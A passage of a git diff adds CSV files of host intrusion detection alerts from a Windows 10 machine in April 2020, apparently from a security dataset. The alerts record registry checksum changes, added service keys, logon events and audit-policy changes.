'67c10bdce559c177fe0d89a2be194410' +New md5sum is : 'a0a3fbc0146d4cec152ee8f8a35a01bd' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : 'c450722f44b2a1ba2f2466819980374b6af74692' +" +"Apr 6, 2020 @ 10:18:09.589",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:09.580",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:09.487",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:09.479",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:09.438",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:09.429",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:06.833",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:06.827",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a40f\TriggerInfo\4' was added. +" +"Apr 6, 2020 @ 10:18:06.822",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a40f\TriggerInfo\3' was added. +" +"Apr 6, 2020 @ 10:18:06.816",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a40f\TriggerInfo\2' was added. +" +"Apr 6, 2020 @ 10:18:06.808",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a40f\TriggerInfo\1' was added. +" +"Apr 6, 2020 @ 10:18:06.801",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a40f\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 10:18:06.797",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:05.577",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:05.574",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:05.474",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '9f6b145dfd560fe21c8d05748910373f' +New md5sum is : '5a754fcbdb46a7ff91137a7b553dc3bc' +Old sha1sum was: '1838fd4dbd6d85706ba7cced91d89cbd875eff11' +New sha1sum is : '79288fe9f75a96d05a584cb89f96d7d4e7cf6429' +" +"Apr 6, 2020 @ 10:18:05.467",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '0c2db3419a15dba7e52bd9e1bed61e50' +New md5sum is : '0830111e6b80b1ae24178fbba8857fdd' +Old sha1sum was: 'beb5a77c657190ccf5e14d9c81f4201b9c95f292' +New sha1sum is : 'a6192d15c24d5dce1865dd445c41e167c220ae7a' +" +"Apr 6, 2020 @ 10:18:05.464",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '569a53da113e27941126d6f916d48ef7' +New md5sum is : '5738de9f7a814537cd2bd0a998907aa3' +Old sha1sum was: '1b2f772dfe95412bcd506ff44a8678ddcce28603' +New sha1sum is : '985678f0758612fec14a8801e20632d728cbf66c' +" +"Apr 6, 2020 @ 10:18:02.799",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:02.789",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:17:07.330",3,"Windows Logon Success", +"Apr 6, 2020 @ 10:17:05.431",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 10:16:39.099",3,"Windows Logon Success", +"Apr 6, 2020 @ 10:16:35.552",3,"Windows User Logoff", +"Apr 6, 2020 @ 10:16:35.537",3,"Windows User Logoff", +"Apr 6, 2020 @ 10:16:35.510",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 10:16:35.490",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 10:16:35.428",5,"License Activation (slui.exe) failed", +"Apr 6, 2020 @ 10:16:35.413",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)", +"Apr 6, 2020 @ 10:16:34.962",5,"License Activation (slui.exe) failed", +"Apr 6, 2020 @ 10:16:29.546",3,"The Windows Search Service started", +"Apr 6, 2020 @ 10:16:28.933",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed", +"Apr 6, 2020 @ 10:16:28.687",3,"Windows Logon Success", +"Apr 6, 2020 @ 10:16:28.478",3,"The database engine attached a database", +"Apr 6, 2020 @ 10:16:28.303",3,"The database engine is starting a new instance", +"Apr 6, 2020 @ 10:16:21.610",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 10:16:21.112",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 10:16:21.071",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 10:16:20.955",3,"Windows Logon Success", +"Apr 6, 2020 @ 10:16:20.424",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 6, 2020 @ 10:16:19.444",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'." +"Apr 6, 2020 @ 10:15:26.004",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 10:15:25.973",5,"WSearch was unavailable to handle a notification event", +"Apr 6, 2020 @ 10:14:45.800",7,"Integrity checksum changed.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : '3ffea4185b0d47e76bb326c56654594e' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : '5df37dd514d046897a20f77f29c8bcf45b0fb623' +" +"Apr 6, 2020 @ 10:14:45.784",7,"Integrity checksum changed.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : '3ffea4185b0d47e76bb326c56654594e' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : '5df37dd514d046897a20f77f29c8bcf45b0fb623' +" +"Apr 6, 2020 @ 10:14:32.016",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'f65ebed619edcfc8fafe21f958215b53' +New md5sum is : '9cc27b7eb9655d243277f5122c2080d2' +Old sha1sum was: '493297f96d762981a98fbe5f8c5b5782c30b65aa' +New sha1sum is : '873e899fee0da9976ee153fd715d7966dee1171b' +" +"Apr 6, 2020 @ 10:14:32.009",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '619d435b1dac461a9b0cfd3b48ee8f37' +New md5sum is : '3bed6b4b8101da842bb6afe04a8271c2' +Old sha1sum was: '95d0826303f42e23fada9a211bd9ea71de2d5c51' +New sha1sum is : '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +" +"Apr 6, 2020 @ 10:14:18.426",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '11a0a0f0fc8f56d3bbc9abddc96e927d' +New md5sum is : '0447d0d52ee5a830c05fbee07043f258' +Old sha1sum was: '1645f3059a0e2400f891ff8183bd5aa72ced616f' +New sha1sum is : 'c52421ca8edc9b41a95e22c437b67f0f199f288a' +" +"Apr 6, 2020 @ 10:13:28.882",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'c07851f8f2e30eb65757347b948170ba' +New md5sum is : '0c2db3419a15dba7e52bd9e1bed61e50' +Old sha1sum was: '8b3f116aaee6cbd1dd5d8bf234c4f02b0a5c3e60' +New sha1sum is : 'beb5a77c657190ccf5e14d9c81f4201b9c95f292' +" +"Apr 6, 2020 @ 10:13:28.870",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'dca242a1798caa2a9ae6de537858dfe3' +New md5sum is : '569a53da113e27941126d6f916d48ef7' +Old sha1sum was: 'c25d276ea70b377a2d82cd0b2ea1b00a07a517ca' +New sha1sum is : '1b2f772dfe95412bcd506ff44a8678ddcce28603' +" +"Apr 6, 2020 @ 10:13:10.595",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 10:13:06.642",3,"Windows Logon Success", +"Apr 6, 2020 @ 10:12:27.431",3,"Service startup type was changed", +"Apr 6, 2020 @ 10:11:39.711",3,"Service startup type was changed", +"Apr 6, 2020 @ 10:11:12.466",3,"Windows Logon Success", +"Apr 6, 2020 @ 10:11:06.736",8,"Windows Audit Policy changed", +"Apr 6, 2020 @ 10:11:06.655",8,"Windows Audit Policy changed", +"Apr 6, 2020 @ 10:10:46.481",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'a249eaefa5ff78b07f237101e264cc9d' +New md5sum is : 'f65ebed619edcfc8fafe21f958215b53' +Old sha1sum was: 'dc3537617a451d2bba559b268af415371f61047d' +New sha1sum is : '493297f96d762981a98fbe5f8c5b5782c30b65aa' +" +"Apr 6, 2020 @ 10:10:46.450",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'ef61c89521b08e3e01139cb68760b8ef' +New md5sum is : '619d435b1dac461a9b0cfd3b48ee8f37' +Old sha1sum was: 'ba75d185787a2442cd9799e96a555ee047e599ce' +New sha1sum is : '95d0826303f42e23fada9a211bd9ea71de2d5c51' +" +"Apr 6, 2020 @ 10:10:46.074",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\Config' checksum changed. +Old md5sum was: '0ebb8711c350212cd2f8c61fc7e2b3cc' +New md5sum is : '4087f5fe742b775fd1c87a55df2c17b1' +Old sha1sum was: 'bfc74fd3e8adb19c38a350b17d56a7813f34acf3' +New sha1sum is : '1297094bac9227c7e50f5aadd1eabc06de017a59' +" +"Apr 6, 2020 @ 10:10:45.793",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\SPP' checksum changed. +Old md5sum was: 'ddbcd3e6531389ab2a41485d4e269c18' +New md5sum is : '2ea51d1ba636ce79794c0e7641fb2a5d' +Old sha1sum was: 'a15f79d86ecf9805b68f9a6da9514885c77bb920' +New sha1sum is : '030126defae599c842ea0f6222bf176d2ee7d204' +" +"Apr 6, 2020 @ 10:10:41.528",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 10:10:37.871",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: '7d1025136862155d96851d39ac74df09' +New md5sum is : 'bb30a4865d0fe96a2d7b53b843e8fa0a' +Old sha1sum was: '1f5532bbeac9873325c8276bc3963a96cd381d39' +New sha1sum is : '98ca91600e4060c62dc2cc91468e632c4fdc3ef6' +" +"Apr 6, 2020 @ 10:10:32.964",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SmsRouter\State\Registration\Map' checksum changed. +Old md5sum was: '457f457ade91790013e3be0cde87ce24' +New md5sum is : 'f725bdba3c624ef1211452f438569838' +Old sha1sum was: '5fbf4fcfcb8efc07a4d5b6abbd9601e5a4beb674' +New sha1sum is : '76d6ea0f40d643341bc4517a2d1b043f15ea0c6b' +" +"Apr 6, 2020 @ 10:10:32.231",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '8c0751118d2ac93a9b9a23ce681da6b9' +New md5sum is : 'b797adbb031d5549972eab8f4fefce92' +Old sha1sum was: '92028e2b4009cdd6e7ec37ac2c9bca2c9d23cfb5' +New sha1sum is : '2710d121cefbac3bfe70dd3a02961d89b19ce275' +" +"Apr 6, 2020 @ 10:10:31.761",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '0feea5d01af86c53a7dc7b1788f7ff87' +New md5sum is : '42b1cfaecd6812f4699ee8e12aa6d8a6' +Old sha1sum was: '1f0ec39f411a103a61ef2d1ffbc5928625c3ec4f' +New sha1sum is : '4bb75f2982bff625b8cb8426313f4a7ef461e8b0' +" +"Apr 6, 2020 @ 10:10:31.700",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '1f5b957847a3a8475b0418a13f466005' +New md5sum is : '11a0a0f0fc8f56d3bbc9abddc96e927d' +Old sha1sum was: 'eb711b8f09d9f29a474a89e4fb99c65db47147ce' +New sha1sum is : '1645f3059a0e2400f891ff8183bd5aa72ced616f' +" +"Apr 6, 2020 @ 10:10:03.338",3,"Software Protection service scheduled successfully", diff --git a/data/MW_20_HIDS_2.csv b/data/MW_20_HIDS_2.csv new file mode 100644 index 0000000..1aaf2e1 --- /dev/null +++ b/data/MW_20_HIDS_2.csv @@ -0,0 +1,1256 @@ +timestamp,"rule.level","rule.description","full_log","data.win.system.message" +"Apr 26, 2020 @ 10:57:36.039",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3f520' was added. +", +"Apr 26, 2020 @ 10:57:36.009",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:57:33.258",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'ed88c4f4720f9ee85957abb94f304681' +New md5sum is : 'bab7f7a65fdaacd4e6b8b6a5061897a9' +Old sha1sum was: 'dfbfadf824ea326343b7e38b3f7914f74c482b0b' +New sha1sum is : '996a854fff250b5a422ab1cf6a5fe4cf3919d15c' +", +"Apr 26, 2020 @ 10:57:31.492",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: '13dc259f379d87b2e5309e0615660fbd' +New md5sum is : '5aa8e4546390bfdbf65b75d3999f7d27' +Old sha1sum was: '7b7640c8ae985ec313fc158f04c94160aed9ba62' +New sha1sum is : 'dfad5825e83ffedce47f82287e54c327bee0a9d2' +", +"Apr 26, 2020 @ 10:57:30.554",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: '9a0e6860ed855c30f134fc56d8ebf295' +New md5sum is : 'b66ff1de44cede493d2d5ec9a100c22f' +Old sha1sum was: 'ed3b06cd890e72527d6a9facc45f47e75ca198c0' +New sha1sum is : '4f8301d8c419c2a62d84573ce68890a97ccf936f' +", +"Apr 26, 2020 @ 10:57:30.445",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3f520' was added. +", +"Apr 26, 2020 @ 10:57:30.429",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3f520\TriggerInfo\0' was added. +", +"Apr 26, 2020 @ 10:57:30.414",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:57:26.258",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: '4f6d055ae9421c6eaaea00278d045ee8' +New md5sum is : 'd3b8b23090d51db3cfe1e9ecd4bf3f60' +Old sha1sum was: '075a70943680f9d5268ab1301ec05918e7969062' +New sha1sum is : 'abb19fb282dc8a8540e74484ab4bef9e1719d561' +", +"Apr 26, 2020 @ 10:57:22.594",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: 'ed88c4f4720f9ee85957abb94f304681' +New md5sum is : 'bab7f7a65fdaacd4e6b8b6a5061897a9' +Old sha1sum was: 'dfbfadf824ea326343b7e38b3f7914f74c482b0b' +New sha1sum is : '996a854fff250b5a422ab1cf6a5fe4cf3919d15c' +", +"Apr 26, 2020 @ 10:57:19.882",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'd49b1e0e5d54f0f3afc8611036d44088' +New md5sum is : 'd6c66f3cfcf282def437343895ab3fa8' +Old sha1sum was: '67d1db6f9eb60c510bc959d4fed11edd37751205' +New sha1sum is : '1f15b20143ed74043de3a339b473192ac5b48b15' +", +"Apr 26, 2020 @ 10:57:19.226",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: 'ed88c4f4720f9ee85957abb94f304681' +New md5sum is : 'bab7f7a65fdaacd4e6b8b6a5061897a9' +Old sha1sum was: 'dfbfadf824ea326343b7e38b3f7914f74c482b0b' +New sha1sum is : '996a854fff250b5a422ab1cf6a5fe4cf3919d15c' +", +"Apr 26, 2020 @ 10:57:18.180",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '1c6e2319780c0264f929f3c3433add82' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'f924403989ef2de336c156640b73fb0db5024306' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +", +"Apr 26, 2020 @ 10:57:11.835",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:57:10.385",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'd4404ea1723d6a64ecf59184c42b56dc' +New md5sum is : 'a9e4daddf64ff555409ab89ed9ce7103' +Old sha1sum was: '0e7668ac8b3a3f95ef8df9750dbd0575ba6ee519' +New sha1sum is : '6efb884e36f6ba353d970450648c378dd9714ff0' +", +"Apr 26, 2020 @ 10:57:03.869",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '2e66bbab6f7f051484904d50bd64c4bd' +New md5sum is : 'ad50f93c84bcc3869d570b2c5f7ec070' +Old sha1sum was: 'd443c4cc88c9009ec68ded5a89a3fda13ac3b6da' +New sha1sum is : 'c401f6fc16c7391a3e6572edd86614ad54bbe351' +", +"Apr 26, 2020 @ 10:57:00.460",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3f520' was added. +", +"Apr 26, 2020 @ 10:57:00.445",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:57:00.366",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3f520' was added. +", +"Apr 26, 2020 @ 10:57:00.351",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:57:00.100",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3f520' was added. +", +"Apr 26, 2020 @ 10:57:00.085",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:56:59.459",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3f520' was added. +", +"Apr 26, 2020 @ 10:56:59.428",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:56:59.303",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3f520' was added. +", +"Apr 26, 2020 @ 10:56:59.288",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:56:59.133",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'd3fc2e40ff1cbd8f3e440cadb414e8a1' +New md5sum is : '841a277fefa4126bc37553936b32cbf8' +Old sha1sum was: 'da09e52cc3e283503fcbc0fc9d976d29b6f64ab9' +New sha1sum is : '4e2a2966c8b1ce70115bdc87ad62f91c16aecfc0' +", +"Apr 26, 2020 @ 10:56:57.600",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3f520' was added. +", +"Apr 26, 2020 @ 10:56:57.585",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:56:57.429",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3f520' was added. +", +"Apr 26, 2020 @ 10:56:57.413",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:56:57.350",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3f520' was added. +", +"Apr 26, 2020 @ 10:56:57.335",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:56:55.147",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f520' was added. +", +"Apr 26, 2020 @ 10:56:55.131",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f520\TriggerInfo\4' was added. +", +"Apr 26, 2020 @ 10:56:55.116",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f520\TriggerInfo\3' was added. +", +"Apr 26, 2020 @ 10:56:55.100",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f520\TriggerInfo\2' was added. +", +"Apr 26, 2020 @ 10:56:55.085",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f520\TriggerInfo\1' was added. +", +"Apr 26, 2020 @ 10:56:55.069",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f520\TriggerInfo\0' was added. +", +"Apr 26, 2020 @ 10:56:55.053",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:56:54.053",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3f520' was added. +", +"Apr 26, 2020 @ 10:56:54.038",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:56:53.808",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '57aab89963db21e021a8fb1def63e397' +New md5sum is : '37d80812ee416845758ac804badeea03' +Old sha1sum was: 'bafc4639617773aa8d06267b01d92467e7e9a1ea' +New sha1sum is : 'acb2534bec4dd00a385b3595b4129ca958624cff' +", +"Apr 26, 2020 @ 10:56:53.796",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '8e6e7974f2d8d3f529f902963e640b87' +New md5sum is : '3e4c738303b2bc7a6fd400bee372c137' +Old sha1sum was: '1b06a841f422b9af803da06e6e4f665d140f2d60' +New sha1sum is : '5de39ea5fb68698262cdbbe2359bcf0acb55c1d2' +", +"Apr 26, 2020 @ 10:56:53.755",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'a5d862c45086d7eb3ecd2008e6e0bf2c' +New md5sum is : '2e26d4cdb348cde76532b1256a8c5a2b' +Old sha1sum was: '7afcf8aea7a5cd7d080891bbbf5c23efc775d31d' +New sha1sum is : 'f11f5b869f02bbb74575cec94ad5149d473309bb' +", +"Apr 26, 2020 @ 10:56:51.319",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3f520' was added. +", +"Apr 26, 2020 @ 10:56:51.288",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:56:44.928",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from demand start to auto start.""" +"Apr 26, 2020 @ 10:56:26.912",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-27T10:55:25Z. Reason: RulesEngine.""" +"Apr 26, 2020 @ 10:56:18.962",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: 